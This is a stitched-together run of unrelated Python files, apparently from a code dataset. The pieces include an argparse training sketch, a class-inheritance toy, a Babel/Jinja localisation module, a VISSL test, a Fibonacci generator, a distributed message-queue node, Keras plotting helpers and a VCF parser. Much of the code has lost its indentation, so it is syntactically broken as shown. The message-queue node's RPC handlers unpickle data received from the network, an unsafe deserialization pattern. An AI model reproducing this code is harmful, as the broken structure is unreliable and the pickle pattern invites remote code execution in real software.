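# Hedged entry-point sketch (not in the original file): argparse is imported and
# main(args) expects parsed flags, but no parser is defined here. The block below
# shows one plausible wiring; the flag names mirror the attributes used above and
# the defaults are guesses, not the author's settings.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='SE-ResNet CIFAR-10 training (sketch)')
    parser.add_argument('--Epoch', type=int, default=500)
    parser.add_argument('--batch_size', type=int, default=128)
    parser.add_argument('--lr', type=float, default=0.1)
    parser.add_argument('--momentum', type=float, default=0.9)
    parser.add_argument('--weight_decay', type=float, default=5e-4)
    parser.add_argument('--print_freq', type=int, default=50)
    parser.add_argument('--save_every', type=int, default=10)
    parser.add_argument('--save_dir', type=str, default='./save_model')
    parser.add_argument('--cutout', action='store_true')
    parser.add_argument('--n_masks', type=int, default=1)
    parser.add_argument('--length', type=int, default=16)
    parser.add_argument('--KD', action='store_true')
    parser.add_argument('--evaluate', action='store_true')
    args = parser.parse_args()
    main(args)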
|
nilq/baby-python
|
python
|
# Parent Class
class Shape:
sname = "Shape"
def getName(self):
return self.sname
# child class
class XShape(Shape):
# initializer
def __init__(self, name):
self.xsname = name
def getName(self): # overriden method
return (super().getName() + ", " + self.xsname)
circle = XShape("Circle")
print(circle.getName())
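# Expected output (for reference): Shape, Circle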
|
nilq/baby-python
|
python
|
# encoding: utf8
from __future__ import print_function, unicode_literals
from io import BytesIO
import re
from unicodedata import combining, normalize
from aspen.resources.pagination import parse_specline, split_and_escape
from aspen.utils import utcnow
from babel.core import LOCALE_ALIASES
from babel.dates import format_timedelta
from babel.messages.extract import extract_python
from babel.numbers import (
format_currency, format_decimal, format_number, format_percent,
get_decimal_symbol, parse_decimal
)
import jinja2.ext
ALIASES = {k: v.lower() for k, v in LOCALE_ALIASES.items()}
ALIASES_R = {v: k for k, v in ALIASES.items()}
ternary_re = re.compile(r'^\(? *(.+?) *\? *(.+?) *: *(.+?) *\)?$')
and_re = re.compile(r' *&& *')
or_re = re.compile(r' *\|\| *')
def ternary_sub(m):
g1, g2, g3 = m.groups()
return '%s if %s else %s' % (g2, g1, ternary_re.sub(ternary_sub, g3))
def get_function_from_rule(rule):
rule = ternary_re.sub(ternary_sub, rule.strip())
rule = and_re.sub(' and ', rule)
rule = or_re.sub(' or ', rule)
return eval('lambda n: ' + rule, {'__builtins__': {}})
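# Illustrative examples (comments added for clarity, not in the original module):
#   get_function_from_rule('n > 1')(2)           -> True, and (0) -> False
#   get_function_from_rule('n == 1 ? 0 : 1')(1)  -> 0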
def get_text(request, loc, s, *a, **kw):
msg = loc.catalog.get(s)
if msg:
s = msg.string or s
if a or kw:
if isinstance(s, bytes):
s = s.decode('ascii')
return s.format(*a, **kw)
return s
def n_get_text(website, request, loc, s, p, n, *a, **kw):
n = n or 0
msg = loc.catalog.get((s, p))
s2 = None
if msg:
try:
s2 = msg.string[loc.catalog.plural_func(n)]
except Exception as e:
website.tell_sentry(e, request)
if s2 is None:
loc = 'en'
s2 = s if n == 1 else p
kw['n'] = format_number(n, locale=loc) or n
if isinstance(s2, bytes):
s2 = s2.decode('ascii')
return s2.format(*a, **kw)
def to_age(dt, loc):
return format_timedelta(dt - utcnow(), add_direction=True, locale=loc)
def regularize_locale(loc):
if loc == 'no':
# There are two forms of written Norwegian, Bokmål and Nynorsk, and
# while ISO 639 includes `no` as a "macrolanguage", the CLDR (upon
# which Babel, our i18n/l10n library, depends), does not include it at
# all. Therefore, if a client sends `no` we interpret it as `nb_NO`.
loc = 'nb_NO'
return loc.replace('-', '_').lower()
def regularize_locales(locales):
"""Yield locale strings in the same format as they are in website.locales.
"""
locales = [regularize_locale(loc) for loc in locales]
locales_set = set(locales)
for loc in locales:
yield loc
parts = loc.split('_')
if len(parts) > 1 and parts[0] not in locales_set:
# Insert "fr" after "fr_fr" if it's not somewhere in the list
yield parts[0]
alias = ALIASES.get(loc)
if alias and alias not in locales_set:
# Insert "fr_fr" after "fr" if it's not somewhere in the list
yield alias
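# Example (for illustration only): regularize_locales(['fr-FR']) yields
# 'fr_fr' and then 'fr', since the country-less fallback is not in the list.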
def strip_accents(s):
return ''.join(c for c in normalize('NFKD', s) if not combining(c))
def get_locale_for_request(request, website):
accept_lang = request.headers.get("Accept-Language", "")
languages = (lang.split(";", 1)[0] for lang in accept_lang.split(","))
languages = request.accept_langs = regularize_locales(languages)
for lang in languages:
loc = website.locales.get(lang)
if loc:
return loc
return website.locale_en
def format_currency_with_options(number, currency, locale='en', trailing_zeroes=True):
s = format_currency(number, currency, locale=locale)
if not trailing_zeroes:
s = s.replace(get_decimal_symbol(locale)+'00', '')
return s
def add_helpers_to_context(website, request):
context = request.context
loc = context['locale'] = get_locale_for_request(request, website)
context['decimal_symbol'] = get_decimal_symbol(locale=loc)
context['_'] = lambda s, *a, **kw: get_text(request, loc, s, *a, **kw)
context['ngettext'] = lambda *a, **kw: n_get_text(website, request, loc, *a, **kw)
context['format_number'] = lambda *a: format_number(*a, locale=loc)
context['format_decimal'] = lambda *a: format_decimal(*a, locale=loc)
context['format_currency'] = lambda *a, **kw: format_currency_with_options(*a, locale=loc, **kw)
context['format_percent'] = lambda *a: format_percent(*a, locale=loc)
context['parse_decimal'] = lambda *a: parse_decimal(*a, locale=loc)
def _to_age(delta):
try:
return to_age(delta, loc)
except:
return to_age(delta, 'en')
context['to_age'] = _to_age
def extract_spt(fileobj, *args, **kw):
pages = list(split_and_escape(fileobj.read()))
npages = len(pages)
for i, page in enumerate(pages, 1):
f = BytesIO(b'\n' * page.offset + page.content)
content_type, renderer = parse_specline(page.header)
extractor = None
if (i == npages and not page.header) or content_type == 'text/html' or renderer == 'jinja2':
extractor = jinja2.ext.babel_extract
elif i < 3:
extractor = extract_python
if extractor:
for match in extractor(f, *args, **kw):
yield match
|
nilq/baby-python
|
python
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
from vissl.utils.hydra_config import compose_hydra_configuration, convert_to_attrdict
from vissl.utils.test_utils import (
gpu_test,
in_temporary_directory,
run_integration_test,
)
class TestRegnet10B(unittest.TestCase):
@staticmethod
def _create_10B_pretrain_config(num_gpus: int, num_steps: int, batch_size: int):
data_limit = num_steps * batch_size * num_gpus
cfg = compose_hydra_configuration(
[
"config=pretrain/swav/swav_8node_resnet",
"+config/pretrain/seer/models=regnet10B",
"config.OPTIMIZER.num_epochs=1",
"config.LOG_FREQUENCY=1",
# Testing on fake images
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TRAIN.RANDOM_SYNTHETIC_IMAGES=True",
"config.DATA.TRAIN.USE_DEBUGGING_SAMPLER=True",
# Disable overlap communication and computation for test
"config.MODEL.FSDP_CONFIG.FORCE_SYNC_CUDA=True",
# Testing on 8 V100 32GB GPU only
f"config.DATA.TRAIN.BATCHSIZE_PER_REPLICA={batch_size}",
f"config.DATA.TRAIN.DATA_LIMIT={data_limit}",
"config.DISTRIBUTED.NUM_NODES=1",
f"config.DISTRIBUTED.NUM_PROC_PER_NODE={num_gpus}",
"config.DISTRIBUTED.RUN_ID=auto",
]
)
args, config = convert_to_attrdict(cfg)
return config
@gpu_test(gpu_count=8)
def test_regnet_10b_swav_pretraining(self):
with in_temporary_directory():
config = self._create_10B_pretrain_config(
num_gpus=8, num_steps=2, batch_size=4
)
results = run_integration_test(config)
losses = results.get_losses()
print(losses)
self.assertEqual(len(losses), 2)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# coding:utf-8
def fib(n):
yield 0
x, y = 0, 1
yield x
for i in range(n-1):
x, y = y, x + y
yield x
'''
fib() can be simplified.
Simplification 1:
def fib(n):
    x, y = 0, 1
    for i in range(n):
        yield x
        x, y = y, x + y
Simplification 2:
def fib(n):
    x, y = 0, 1
    for i in range(n-1):
        x, y = y, x + y
        yield x
'''
n = int(input("Please enter a number: "))
fib_lst = []
for i in fib(n):
fib_lst.append(i)
print("\nNo.{0} Fibonacci number is {1}.".format(n, fib_lst[-1]))
'''
A yield expression is used when defining a generator function or an asynchronous
generator function, and it may only appear in the body of a function definition.
Using a yield expression in a function body makes that function a generator.
Example taken from the official documentation:
>>> def echo(value=None):
... print("Execution starts when 'next()' is called for the first time.")
... try:
... while True:
... try:
... value = (yield value)
... except Exception as e:
... value = e
... finally:
... print("Don't forget to clean up when 'close()' is called.")
...
>>> generator = echo(1)
>>> print(next(generator))
Execution starts when 'next()' is called for the first time.
1
>>> print(next(generator))
None
>>> print(generator.send(2))
2
>>> generator.throw(TypeError, "spam")
TypeError('spam',)
>>> generator.close()
Don't forget to clean up when 'close()' is called.
'''
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2014-4-27
@author: chine
'''
import os
import threading
try:
import cPickle as pickle
except ImportError:
import pickle
from collections import defaultdict
import socket
from cola.core.rpc import client_call
from cola.core.utils import get_rpc_prefix
from cola.core.mq.store import Store
from cola.core.mq.distributor import Distributor
MQ_STATUS_FILENAME = 'mq.status' # file name of message queue status
PRIORITY_STORE_FN = 'store'
BACKUP_STORE_FN = 'backup'
INCR_STORE_FN = 'inc'
CACHE_SIZE = 20
class LocalMessageQueueNode(object):
"""
    Message queue node which only handles local mq operations
    and can also be in charge of handling remote calls.
    This node includes several stores: a priority store
    for each priority, an incremental store, as well as the
    backup store. Each store is an instance of
:class:`~cola.core.mq.store.Store`.
"""
def __init__(self, base_dir, rpc_server, addr, addrs,
copies=1, n_priorities=3, deduper=None,
app_name=None):
self.dir_ = base_dir
self.rpc_server = rpc_server
assert addr in addrs
self.addr = addr
self.addrs = addrs
self.other_addrs = [n for n in self.addrs if n != self.addr]
self.copies = max(min(len(self.addrs)-1, copies), 0)
self.n_priorities = max(n_priorities, 1)
self.deduper = deduper
self.app_name = app_name
self._lock = threading.Lock()
self._register_rpc()
self.inited = False
def init(self):
with self._lock:
if self.inited: return
get_priority_store_dir = lambda priority: os.path.join(self.dir_,
PRIORITY_STORE_FN, str(priority))
self.priority_stores = [Store(get_priority_store_dir(i),
deduper=self.deduper,
mkdirs=True) \
for i in range(self.n_priorities)]
backup_store_dir = os.path.join(self.dir_, BACKUP_STORE_FN)
self.backup_stores = {}
for backup_addr in self.other_addrs:
backup_node_dir = backup_addr.replace(':', '_')
backup_path = os.path.join(backup_store_dir, backup_node_dir)
self.backup_stores[backup_addr] = Store(backup_path,
size=512*1024, mkdirs=True)
inc_store_dir = os.path.join(self.dir_, INCR_STORE_FN)
self.inc_store = Store(inc_store_dir, mkdirs=True)
self.inited = True
def _register_rpc(self):
if self.rpc_server:
self.register_rpc(self, self.rpc_server, app_name=self.app_name)
@classmethod
def register_rpc(cls, node, rpc_server, app_name=None):
prefix = get_rpc_prefix(app_name, 'mq')
rpc_server.register_function(node.put_proxy, name='put',
prefix=prefix)
rpc_server.register_function(node.batch_put_proxy, name='batch_put',
prefix=prefix)
rpc_server.register_function(node.put_backup_proxy, name='put_backup',
prefix=prefix)
rpc_server.register_function(node.get_proxy, name='get',
prefix=prefix)
rpc_server.register_function(node.exist, name='exist',
prefix=prefix)
def put(self, objs, force=False, priority=0):
self.init()
priority = max(min(priority, self.n_priorities-1), 0)
priority_store = self.priority_stores[priority]
priority_store.put(objs, force=force)
def put_proxy(self, pickled_objs, force=False, priority=0):
"""
        Objects from a remote call should be pickled to
        avoid serialization errors.
        :param pickled_objs: the pickled objects to put into mq
        :param force: if set to True, the objects are put into mq directly
                      without checking for duplication
        :param priority: the priority queue to put into
"""
objs = pickle.loads(pickled_objs)
self.put(objs, force=force, priority=priority)
def batch_put(self, objs):
self.init()
puts = defaultdict(lambda:defaultdict(list))
for obj in objs:
priority = getattr(obj, 'priority', 0)
force = getattr(obj, 'force', False)
puts[priority][force].append(obj)
for priority, m in puts.iteritems():
for force, obs in m.iteritems():
self.put(obs, force=force, priority=priority)
def batch_put_proxy(self, pickled_objs):
"""
        Unlike :func:`put`, this method checks each object's ``priority``
        to decide which priority queue it should be put into.
"""
objs = pickle.loads(pickled_objs)
self.batch_put(objs)
def put_backup(self, addr, objs, force=False):
self.init()
backup_store = self.backup_stores[addr]
backup_store.put(objs, force=force)
def put_backup_proxy(self, addr, pickled_objs, force=False):
"""
        In the Cola backup mechanism, an object is not only
        put into a hash ring node, but also into the next
        hash ring node, which is marked as a backup node. The backup node
        remembers the name of the node it backs up.
        :param addr: the node address to back up
        :param pickled_objs: pickled objects
        :param force: if True, the objects are put into the queue without checking for duplication
"""
objs = pickle.loads(pickled_objs)
self.put_backup(addr, objs, force=force)
def put_inc(self, objs, force=True):
self.init()
self.inc_store.put(objs, force=force)
def get(self, size=1, priority=0):
self.init()
priority = max(min(priority, self.n_priorities-1), 0)
priority_store = self.priority_stores[priority]
return priority_store.get(size=size)
def get_proxy(self, size=1, priority=0):
"""
        Get objects from the specific priority queue.
        :param size: if size == 1 the result is a single object,
                     otherwise a list of objects
        :param priority: the priority queue to fetch from
        :return: the pickled result, ready to be sent back over RPC
"""
return pickle.dumps(self.get(size=size, priority=priority))
def get_backup(self, addr, size=1):
self.init()
backup_store = self.backup_stores[addr]
return backup_store.get(size=size)
def get_inc(self, size=1):
self.init()
return self.inc_store.get(size=size)
def add_node(self, addr):
"""
        When a new message queue node joins, its address is first added
        to the known queue nodes, and then a backup store for this node is created.
"""
if addr in self.addrs: return
self.addrs.append(addr)
backup_store_dir = os.path.join(self.dir_, BACKUP_STORE_FN)
backup_node_dir = addr.replace(':', '_')
backup_path = os.path.join(backup_store_dir, backup_node_dir)
self.backup_stores[addr] = Store(backup_path,
size=512*1024, mkdirs=True)
def remove_node(self, addr):
"""
        For a removed node, this method performs the cleanup, including
        shutting down the backup storage kept for that node.
"""
if addr not in self.addrs: return
self.addrs.remove(addr)
self.backup_stores[addr].shutdown()
del self.backup_stores[addr]
def exist(self, obj):
if self.deduper:
return self.deduper.exist(str(obj))
return False
def shutdown(self):
if not self.inited: return
[store.shutdown() for store in self.priority_stores]
for backup_store in self.backup_stores.values():
backup_store.shutdown()
self.inc_store.shutdown()
class MessageQueueNodeProxy(object):
"""
This class maintains an instance of :class:`~cola.core.mq.node.LocalMessageQueueNode`,
    and provides `PUT`- and `GET`-related methods.
    In each mq operation, it executes a local or remote call by judging the address.
    A remote call actually sends an RPC to the destination worker's instance, which
    executes the method provided by :class:`~cola.core.mq.node.LocalMessageQueueNode`.
    Besides, this class also maintains an instance of :class:`~cola.core.mq.distributor.Distributor`
    which holds a hash ring. For a `PUT` operation, each object is distributed to
    its destination according to the hash ring. A cache is kept
    to avoid frequent write operations, which could put a heavy burden on a message queue node.
    For a `GET` operation, the mq just fetches objects from the local node,
    or requests them from other nodes once the local objects are exhausted.
"""
def __init__(self, base_dir, rpc_server, addr, addrs,
copies=1, n_priorities=3, deduper=None,
app_name=None, logger=None):
self.dir_ = base_dir
self.addr_ = addr
self.addrs = list(addrs)
self.mq_node = LocalMessageQueueNode(
base_dir, rpc_server, addr, addrs,
copies=copies, n_priorities=n_priorities, deduper=deduper,
app_name=app_name)
self.distributor = Distributor(addrs, copies=copies)
self.logger = logger
self.prefix = get_rpc_prefix(app_name, 'mq')
self._lock = threading.Lock()
self.inited = False
@classmethod
def register_rpc(cls, node, rpc_server, app_name=None):
LocalMessageQueueNode.register_rpc(node.mq_node, rpc_server,
app_name=app_name)
def init(self):
with self._lock:
if self.inited: return
self.load()
if not hasattr(self, 'caches'):
self.caches = dict((addr, []) for addr in self.addrs)
if not hasattr(self, 'caches_inited'):
self.caches_inited = dict((addr, False) for addr in self.addrs)
if not hasattr(self, 'backup_caches'):
self.backup_caches = dict((addr, {}) for addr in self.addrs)
for addr in self.addrs:
for other_addr in [n for n in self.addrs if addr != n]:
self.backup_caches[addr][other_addr] = []
self.mq_node.init()
self.inited = True
def load(self):
save_file = os.path.join(self.dir_, MQ_STATUS_FILENAME)
if not os.path.exists(save_file):
return
with open(save_file, 'r') as f:
self.caches, self.caches_inited, self.backup_caches = pickle.load(f)
def save(self):
if not self.inited:
return
save_file = os.path.join(self.dir_, MQ_STATUS_FILENAME)
with open(save_file, 'w') as f:
t = (self.caches, self.caches_inited, self.backup_caches)
pickle.dump(t, f)
def _check_empty(self, objs):
if objs is None:
return True
elif isinstance(objs, list) and len(objs) == 0:
return True
return False
def _remote_or_local_put(self, addr, objs, force=False, priority=0):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.put(objs, force=force, priority=priority)
else:
client_call(addr, self.prefix+'put', pickle.dumps(objs),
force, priority)
def _remote_or_local_batch_put(self, addr, objs):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.batch_put(objs)
else:
client_call(addr, self.prefix+'batch_put', pickle.dumps(objs))
def _remote_or_local_get(self, addr, size=1, priority=0):
objs = None
if addr == self.addr_:
objs = self.mq_node.get(size=size, priority=priority)
else:
objs = pickle.loads(client_call(addr, self.prefix+'get',
size, priority))
addr_caches = self.caches.get(addr, [])
if size == 1 and objs is None and len(addr_caches) > 0:
return addr_caches.pop(0)
elif size > 1 and len(objs) == 0 and len(addr_caches) > 0:
return addr_caches[:size]
return objs
def _remote_or_local_put_backup(self, addr, backup_addr, objs,
force=False):
if self._check_empty(objs):
return
if addr == self.addr_:
self.mq_node.put_backup(backup_addr, objs, force=force)
else:
client_call(addr, self.prefix+'put_backup', backup_addr,
pickle.dumps(objs), force)
def put(self, objects, flush=False):
"""
Put a bunch of objects into the mq. The objects will be distributed
to different mq nodes according to the instance of
:class:`~cola.core.mq.distributor.Distributor`.
        A cache also exists and is only flushed out when the parameter ``flush``
        is True or a single destination's cache is full.
        :param objects: objects to put into mq; an object is typically an instance of
                        :class:`~cola.core.unit.Url` or :class:`~cola.core.unit.Bundle`
        :param flush: flush out the whole cache if set to True
"""
self.init()
addrs_objs, backup_addrs_objs = \
self.distributor.distribute(objects)
if flush is True:
for addr in self.addrs:
if addr not in addrs_objs:
addrs_objs[addr] = []
if addr not in backup_addrs_objs:
backup_addrs_objs[addr] = {}
for addr, objs in addrs_objs.iteritems():
self.caches[addr].extend(objs)
if not self.caches_inited[addr] or \
len(self.caches[addr]) >= CACHE_SIZE or flush:
try:
self._remote_or_local_batch_put(addr, self.caches[addr])
except socket.error, e:
if self.logger:
self.logger.exception(e)
else:
self.caches[addr] = []
if not self.caches_inited[addr]:
self.caches_inited[addr] = True
for addr, m in backup_addrs_objs.iteritems():
for backup_addr, objs in m.iteritems():
self.backup_caches[addr][backup_addr].extend(objs)
size = sum([len(obs) for obs in \
self.backup_caches[addr].values()])
if size >= CACHE_SIZE or flush:
for backup_addr, objs in self.backup_caches[addr].iteritems():
try:
self._remote_or_local_put_backup(
addr, backup_addr, objs)
except socket.error, e:
if self.logger:
self.logger.exception(e)
else:
self.backup_caches[addr][backup_addr] = []
def get(self, size=1, priority=0):
"""
Get a bunch of objects from the message queue.
        This method first tries to fetch as many objects as requested from the local node.
        If that is not enough, it tries to fetch from the other nodes.
        :param size: the number of objects to fetch
        :param priority: the priority queue to fetch from
        :return: the objects to handle
"""
self.init()
if size < 1: size = 1
results = []
_addrs = sorted(self.addrs, key=lambda k: k==self.addr_,
reverse=True)
for addr in _addrs:
left = size - len(results)
if left <= 0:
break
objs = None
try:
objs = self._remote_or_local_get(addr, size=left,
priority=priority)
except socket.error, e:
if self.logger:
self.logger.exception(e)
if objs is None:
continue
if not isinstance(objs, list):
objs = [objs, ]
results.extend(objs)
if size == 1:
if len(results) == 0:
return
return results[0]
return results
def put_inc(self, objs):
self.mq_node.put_inc(objs)
def get_inc(self, size=1):
return self.mq_node.get_inc(size=size)
def flush(self):
self.put([], flush=True)
def add_node(self, addr):
if addr in self.addrs: return
self.init()
self.distributor.add_node(addr)
self.addrs.append(addr)
self.caches[addr] = []
self.caches_inited[addr] = False
self.backup_caches[addr] = {}
for o_addr in self.addrs:
if o_addr != addr:
self.backup_caches[addr][o_addr] = []
self.backup_caches[o_addr][addr] = []
self.mq_node.add_node(addr)
def remove_node(self, addr):
if addr not in self.addrs: return
self.init()
self.distributor.remove_node(addr)
self.addrs.remove(addr)
self.mq_node.batch_put(self.caches[addr])
del self.caches[addr]
del self.caches_inited[addr]
del self.backup_caches[addr]
for o_addr in self.addrs:
if o_addr != addr:
del self.backup_caches[o_addr][addr]
self.flush()
BATCH_SIZE = 10
objs = self.mq_node.get_backup(addr, size=BATCH_SIZE)
while len(objs) > 0:
self.mq_node.batch_put(objs)
objs = self.mq_node.get_backup(addr, size=BATCH_SIZE)
self.mq_node.remove_node(addr)
def exist(self, obj):
return self.mq_node.exist(obj)
def shutdown(self):
if not self.inited: return
self.mq_node.shutdown()
self.save()
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.shutdown()
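# ----------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the original module).
# It assumes a single local node with no RPC server and no deduper; the base
# directory and address below are placeholders.
#
# if __name__ == '__main__':
#     mq = MessageQueueNodeProxy('/tmp/mq_demo', None, '127.0.0.1:11103',
#                                ['127.0.0.1:11103'], copies=0)
#     mq.put(['http://example.com/a', 'http://example.com/b'], flush=True)
#     print mq.get(size=2)
#     mq.shutdown()
# ----------------------------------------------------------------------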
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
import tensorflow as tf
import keras as keras
def print_elapsed_time(total_time):
''' Prints elapsed time in hh:mm:ss format
'''
hh = int(total_time / 3600)
mm = int((total_time % 3600) / 60)
ss = int((total_time % 3600) % 60)
print(
"\n** Total Elapsed Runtime: {:0>2}:{:0>2}:{:0>2}".format(hh, mm, ss))
def plot_accuracy(history):
# get accuracy histories
training_acc = history.history['acc']
validation_acc = history.history['val_acc']
    # create count of the number of epochs
epoch_count = range(1, len(training_acc) + 1)
# visualize accuracy history
plt.plot(epoch_count, training_acc, 'r--')
plt.plot(epoch_count, validation_acc, 'b-')
plt.legend(['Training Accuracy', 'Validation Accuracy'])
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.show()
def plot_loss(history):
# get loss histories
training_loss = history.history['loss']
validation_loss = history.history['val_loss']
# create count of the number of epochs
epoch_count = range(1, len(training_loss) + 1)
# visualize loss history
plt.plot(epoch_count, training_loss, 'r--')
plt.plot(epoch_count, validation_loss, 'b-')
plt.legend(['Training Loss', 'Validation Loss'])
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.show()
# Visualize original and augmented images
# refer https://github.com/udacity/aind2-cnn for details
def print_versions():
print("Tensorflow version: {}".format(tf.__version__))
print("Keras version: {}".format(keras.__version__))
def visualize_augmented_images(training_data, datagen, image_count):
# take subset of training data
training_data_subset = training_data[:image_count]
# visualize subset of training data
fig = plt.figure(figsize=(20, 2))
for i in range(0, len(training_data_subset)):
ax = fig.add_subplot(1, image_count, i+1)
ax.imshow(training_data_subset[i])
fig.suptitle('Subset of Original Training Images', fontsize=20)
plt.show()
# visualize augmented images
fig = plt.figure(figsize=(20, 2))
for x_batch in datagen.flow(training_data_subset, batch_size=12):
for i in range(0, image_count):
ax = fig.add_subplot(1, image_count, i+1)
ax.imshow(x_batch[i])
fig.suptitle('Augmented Images', fontsize=20)
plt.show()
break
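# Illustrative usage sketch (not part of the original module). It assumes a
# compiled Keras `model` and `x_train`/`y_train` arrays already exist; note
# that newer Keras versions record 'accuracy'/'val_accuracy' instead of
# 'acc'/'val_acc', so plot_accuracy may need its keys adjusted.
#
# history = model.fit(x_train, y_train, validation_split=0.2, epochs=10)
# plot_loss(history)
# plot_accuracy(history)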
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
import re
import sys
import gzip
import pysam
#import itertools
import mimetypes
from collections import OrderedDict #,defaultdict
class VCF(object):
"""docstring for VCF"""
def __init__(self,
input,
output=None,
populations=None,
region=None,
window_size=1,
step=0,
snvs=None,
empty_vcf_line=None):
super(VCF, self).__init__()
self.input = input
self.output = output
self.step = step
self.populations = populations
self.region = region
self.window_size = window_size
self.header = self.__extract_header__()
self.chrms_2_sizes = self.__get_chrm_ids_and_sizes__()
self.empty_vcf_line = self.make_empty_vcf_ordered_dict()
def __open_vcf__(self):
"""Open vcf file as gzip or as text."""
if type(self.input) is file:
fin = self.input
        elif mimetypes.guess_type(self.input)[-1] == 'gzip':
fin = gzip.open(self.input, 'rb')
else:
fin = open(self.input, 'r')
return fin
def __extract_header__(self):
#print [line.strip() for line in self.__open_vcf__()]
header = []
for line in self.__open_vcf__():
if line.startswith("#") == True:
header.append(line.strip())
else:
break
return header
def __get_chrm_ids_and_sizes__(self):
""" Extract chromosome ids and sizes from vcf file.
Return as dictionary"""
chrms_sizes_dict = OrderedDict()
# with self.__open_vcf__() as fin:
for line in self.header:
if line.startswith("##contig"):
chrm_name = re.findall(r'ID=.*,', line)
chrm_name = chrm_name[0].strip('ID=').strip(',')
chrm_length = re.findall(r'length=.*>', line)
chrm_length = int(chrm_length[0].strip('length=').strip('>'))
chrms_sizes_dict[chrm_name] = chrm_length
break
return chrms_sizes_dict
def make_empty_vcf_ordered_dict(self):
"""Open VCF file and read in #CHROM line as an Ordered Dict"""
header_dict = None
for line in self.header:
if line.startswith("#CHROM"):
header = line.strip("#").strip().split()
header_dict = OrderedDict([(item, None) for item in header])
break
return header_dict
def process_snp(self, snp_call):
if snp_call == "0/0":
return (0,0)
elif snp_call == "1/1":
return (1,1)
elif snp_call == '1/0' or \
snp_call == '0/1':
return (0,1)
# skip multiallelic sites
else:
return None
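    # Example (illustrative): process_snp("0/1") returns (0, 1), while a
    # multiallelic call such as "1/2" falls through to the final branch
    # and returns None.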
def process_snp_call(self, snp_call, ref, alt, IUPAC_ambiguities=False):
"""Process VCF genotype fields."""
# IUPAC ambiguity codes
IUPAC_dict = {('A', 'C'): 'M',
('A', 'G'): 'R',
('A', 'T'): 'W',
('C', 'G'): 'S',
('C', 'T'): 'Y',
('G', 'T'): 'K',
('A', 'C', 'G'): 'V',
('A', 'C', 'T'): 'H',
('A', 'G', 'T'): 'D',
('C', 'G', 'T'): 'B'}
        if snp_call == None:
            called_base = "-"
        elif snp_call["GT"] == "./.":
            called_base = "-"
else:
allele1, allele2 = snp_call["GT"].split("/")
# process "0/0"
if allele1 == '0' and allele2 == '0':
called_base = ref
if allele1 == '1' and allele2 == '1':
called_base = alt
# process "0/N"
if allele1 == '0' and allele2 != '0':
if IUPAC_ambiguities == False:
called_base = 'N'
else:
call = [ref] + [alt.split(',')[int(allele2) - 1]]
call.sort()
call = tuple(call)
called_base = IUPAC_dict[call]
# process "2/2, 1/2, etc."
if int(allele1) >= 1 and int(allele2) > 1:
# deal with homozygotes
if allele1 == allele2:
called_base = alt.split(',')[int(allele1) - 1]
# deal with heterozygotes
else:
if IUPAC_ambiguities == False:
called_base = 'N'
else:
ref = alt.split(',')[int(allele1) - 1]
alt = alt.split(',')[int(allele2) - 1]
call = [ref, alt]
call.sort()
call = tuple(call)
called_base = IUPAC_dict[call]
return called_base
def count_alleles(self, chunk):
results = []
for line in chunk:
pop_counts = {}
for pop in self.populations.keys():
allele_counts = {'REF':0, 'ALT':0}
for sample in self.populations[pop]:
if line[sample] != None:
ref, alt = self.process_snp(line[sample]['GT'])
allele_counts['REF'] += ref
allele_counts['ALT'] += alt
pop_counts[pop] = allele_counts.copy()
results.append(pop_counts.copy())
return results
def vcf_slice_iterator(self, vcf_bgzipped_file, region):
tbx = pysam.Tabixfile(vcf_bgzipped_file)
try:
vcf_slice = tbx.fetch(*region)
except ValueError:
print 'bad vcf slice:', region
sys.exit()
else:
for row in vcf_slice:
yield self.parse_vcf_line(row, self.empty_vcf_line)
#return ((chrm, start, stop), chunk)
#return tuple(row for row in vcf_slice)
def vcf_file_iterator(self, as_dict=True):
for line in self.__open_vcf__():
if line.startswith("#") is not True:
if as_dict == True:
yield self.parse_vcf_line(line, self.empty_vcf_line.copy())
else:
yield line
else:
continue
def parse_info_field(self, info_field):
info_dict = {}
for item in info_field.split(';'):
pair = item.split("=")
if len(pair) == 2:
info_dict[pair[0]] = pair[1] # this could be improved on
return info_dict
def get_population_sizes(self, vcfline):
sample_counts = {}
for pop in self.populations.keys():
sample_count = 0
for sample in self.populations[pop]:
if vcfline[sample] is not None:
sample_count += 1
sample_counts[pop] = sample_count
return sample_counts
def parse_vcf_line(self, pos, vcf_line_dict):
"""Read in VCF line and convert it to an OrderedDict"""
pos_parts = pos.strip().split()
for count, item in enumerate(vcf_line_dict):
vcf_line_dict[item] = pos_parts[count]
sample_format = vcf_line_dict["FORMAT"].split(":")
for count, item in enumerate(vcf_line_dict):
if count >= 9:
genotype = vcf_line_dict[item]
if "./." in genotype or ".|." in genotype or genotype == ".": # "'./.'' for dip, '.' for haploid
vcf_line_dict[item] = None
else:
genotype = dict(zip(sample_format, genotype.split(":")))
                    # CONVERT STRINGS TO APPROPRIATE TYPES (INTS, FLOATS, ETC.)
if genotype.has_key("GQ"):
genotype['GQ'] = float(genotype['GQ'])
if genotype.has_key("DP"):
genotype['DP'] = int(genotype['DP'])
if genotype.has_key("AD"):
genotype['AD'] = tuple(int(ad) for ad in genotype['AD'].split(","))
if genotype.has_key("PL"):
genotype['PL'] = tuple(int(ad) for ad in genotype['PL'].split(","))
vcf_line_dict[item] = genotype
vcf_line_dict['POS'] = int(vcf_line_dict['POS'])
try:
vcf_line_dict['QUAL'] = float(vcf_line_dict['QUAL'])
except ValueError:
pass
